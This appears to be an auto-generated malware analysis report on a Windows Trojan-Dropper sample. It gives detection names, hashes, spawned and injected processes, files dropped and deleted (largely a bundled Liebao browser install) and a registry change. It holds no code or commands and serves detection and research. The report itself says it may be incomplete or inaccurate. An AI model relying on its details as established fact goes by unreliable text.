Trojan-Dropper.Win32.Injector.jksa (Kaspersky), Gen:Variant.Graftor.Elzob.84 (B) (Emsisoft), Gen:Variant.Graftor.Elzob.84 (AdAware), GenericEmailWorm.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5b0348707a150821aaf29801d98ac60f
SHA1: 040a6a4247ee17fa7b8281caec76262e51138947
SHA256: 748f27ab38313af3423fca9997e41f45ff6a05aa20fbc7dab500727ffe573d96
SSDeep: 49152:Ec//////ZTIeezIl KqykWJQ2aM2zLoOVxkUAP30dIUmwiGECOIr2G2XP49ajkbP:Ec////// 1K6WJozLXn 30d7f25P4IjA
Size: 2692608 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: APPS installer
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. A Trojan program intended for the stealthy installation of other malware on the user's system.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
ksbinstaller_66_82685.exe:984
%original file name%.exe:1264
KNBCenter.exe:1240
regsvr32.exe:1536
liebao.exe:1780
liebao.exe:516
down_s_66_82685.exe:1988
ping.exe:972
wuauclt.exe:924
tencentdl.exe:1932
netsh.exe:320
Tencentdl.exe:848
0liebao.exe:1948
knbcenter.exe:2036
knbcenter.exe:916
reg.exe:1976
reg.exe:708
skinupdater.exe:348
The Trojan injects its code into the following process(es):
手机轰炸机.exe:652
File activity
The process ksbinstaller_66_82685.exe:984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (586 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearchb.dat (6341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztma002d.psg (74 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.ini (172 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbpolicy.dll (15628 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\alipay.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\baifubao.png (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\atxhlp.dat (21 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\xinput1_3.dll (880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kdumprep.exe (7541 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\毒霸网址大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3002.ksg (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseutil.dll (2976 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj021204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0005.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\unknown.ksg (422 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\libvideo.dat (15 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_unsafe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\bc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\vinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\spdb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepbb002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaevname.dat (108 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksedset.ini (425 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepc0002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7001.vsg (265 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\修复浏览器.lnk (748 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome.dll (503987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0002.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\cdeploy.dat (11 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Localauto.db (40 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\manifest.json (2 bytes)
%System%\drivers\ksapi.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\KNBDrv64.sys (1543 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\99bill.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Install.bat (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\npaliedit.dll (2836 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gare.db (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj011204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb7001.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3001.ksg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Extract.dll (3773 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\incognito.dat (1650 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepba000.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7999.vsg (266 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kmsgsvc.dll (8953 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac002.ksg (3702 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\skin_thumbnail.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\karchive.dat (101 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6001.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\boc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaext2.dat (85 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\skinupdater.exe (21987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\autofilljs2.dat (89 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\FixBrowser.exe (18429 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adfilter.dat (131 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0002.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kui.pak (30655 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvba012.vsg (273 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\en-US.pak (195 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBrowserUpgrade2.dll (2787 bytes)
%Documents and Settings%\%current user%\Desktop\猎豹安全浏览器.lnk (634 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.fsg (120 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksecfg.ini (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\psbc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zema0007.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\befc2009.psg (82 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmb0014.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdet2.dll (10359 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\p1tl.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\mousegesturelib.xml (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\卸载猎豹安全浏览器.lnk (726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\newtab_img2.zip (7972 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\nologin.dat (897 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw2.dat (772 bytes)
%Program Files%\liebao\2014522163323984_1\browserpacket.xml (178 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_touch_100_percent.pak (6399 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbctrl.dll (3109 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ManualUpgrade.exe (9449 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\resources.pak (45687 bytes)
%Documents and Settings%\%current user%\Desktop\毒霸网址大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\config\kseeat.cfg (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (238 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\trackers.dat (1760 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.sys (712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\ceb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences_resintall (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay_site.dat (19 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\tn.dat (1704 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.dat (327 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\AllSigns.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000f.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_en-US.pak (25 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksesscan.dll (7879 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\sqlite3.exe (5007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\ljdfelebfnfpjclmmkljlnagcdkpfpdl\1.0\Cached Theme.pak (6363 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\zlib1.dll (1112 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\KPreferences (503 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb8009.ksg (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uninst.exe (10202 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseexf.dat (107 bytes)
%Program Files%\liebao\liebao.exe (11518 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksepnf.dat (107 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\dlcore.dll (20026 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw.dat (669 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb8003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\checkvideo.dat (61 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb8008.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_46.dll (28052 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\localurl.db (3668 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kadfilter.dll (5863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\LegoIcon\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\MouseGesture.dll (8245 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\feature2.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libGLESv2.dll (5682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install_info.json (255 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay.dat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install2_log.log (72726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj101204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac001.ksg (1844 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\third_party\baidu_hd_query.dll (3341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmc0000.psg (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\czb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\pepflashplayer.dll (110917 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb7001.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBUpdateHelper.dll (13747 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ffmpegsumo.dll (11323 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\kvipinter.dll (3811 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\猎豹安全浏览器.lnk (632 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.dll (691 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb9008.vsg (264 bytes)
%System%\drivers\KNBDrv64.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\hxb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseescan.dll (4564 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000b.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Logos.db (3769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0011.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ktoolupd.dll (2779 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\icbc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj141203.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.exe (14580 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6002.ksg (4 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipbb004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfb7001.fsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb0001.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\Allvinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseset.dat (229 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\srvpref.dat (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj051204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\zh-CN.pak (193 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\resource.dat (735 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Bookmarks (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_43.dll (15709 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.ksg (888 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0019.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\ksais.dat (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\anti_injection2.dat (710 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\scom.dll (1596 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libEGL.dll (1722 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kfcdetect.dll (7469 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\SecondaryTile.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\np-mswmp.dll (1724 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0005.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uplive.dll (15007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\sqlite.dll (1872 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvbb00d.vsg (270 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\signs.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\tenpay.png (2 bytes)
%Program Files%\liebao\test_access (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_100_percent.pak (6387 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\cmb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearcha.dat (1358 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gdeploy.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb9002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\gdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaextend.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\upgrade.dll (9080 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecoref.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipba004.ksg (7 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorea.dat (173 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kaxhlp.dll (4594 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adb_easylist.dat (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbdrv.sys (1326 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\webresource.dat (7712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.dll (210497 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\TNProxy.dll (5849 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.ico (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\switchcore.db (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\Cached Theme.pak (1610 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\knbcenter.exe (4415 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\unionpay.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxy.dll (4458 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kwnp.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\master_preferences (557 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Tencentdl.exe (8880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\sdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipc0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cyui.exe (3249 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_safe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdt.ini (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7002.vsg (294 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\DesktopTips.exe (7305 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_zh-CN.pak (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorem.dat (97 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\wd.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfc2009.psg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb7004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxyPS.dll (1806 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\猎豹安全浏览器.lnk (652 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cysvc.dll (6685 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (0 bytes)
%Program Files%\liebao\2014522163323984_1 (0 bytes)
%Program Files%\liebao\test_access (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (0 bytes)
%Program Files%\liebao\4.5.34.6725 (0 bytes)
The process %original file name%.exe:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0liebao.exe (3750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\手机轰炸机.exe (12288 bytes)
The process KNBCenter.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\liebao\4.5.34.6725\Data\expand_safepay.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\manager.log (455 bytes)
%Program Files%\liebao\4.5.34.6725\log\kmctrl.log (1537 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\cleanup.log (1064 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (0 bytes)
The process liebao.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (32 bytes)
The process liebao.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\2.tmp (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000002.dbtmp (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\CURRENT~RFab99b.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\CURRENT (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State~RFab97b.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000003.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOCK (0 bytes)
The process down_s_66_82685.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.tmp (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (365108 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd (9216408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (3656 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (0 bytes)
The process wuauclt.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The process Tencentdl.exe:848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Tencent\QQDownload\122\dlcore.dll (14022 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe (6841 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\extract.dll (2105 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\DownloadProxyPS.dll (601 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\InstallInfo.xml (25 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\tnproxy.dll (2105 bytes)
The process 0liebao.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (350 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (5547 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (0 bytes)
Registry activity
The process ksbinstaller_66_82685.exe:984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\liebao]
"Report" = "1"
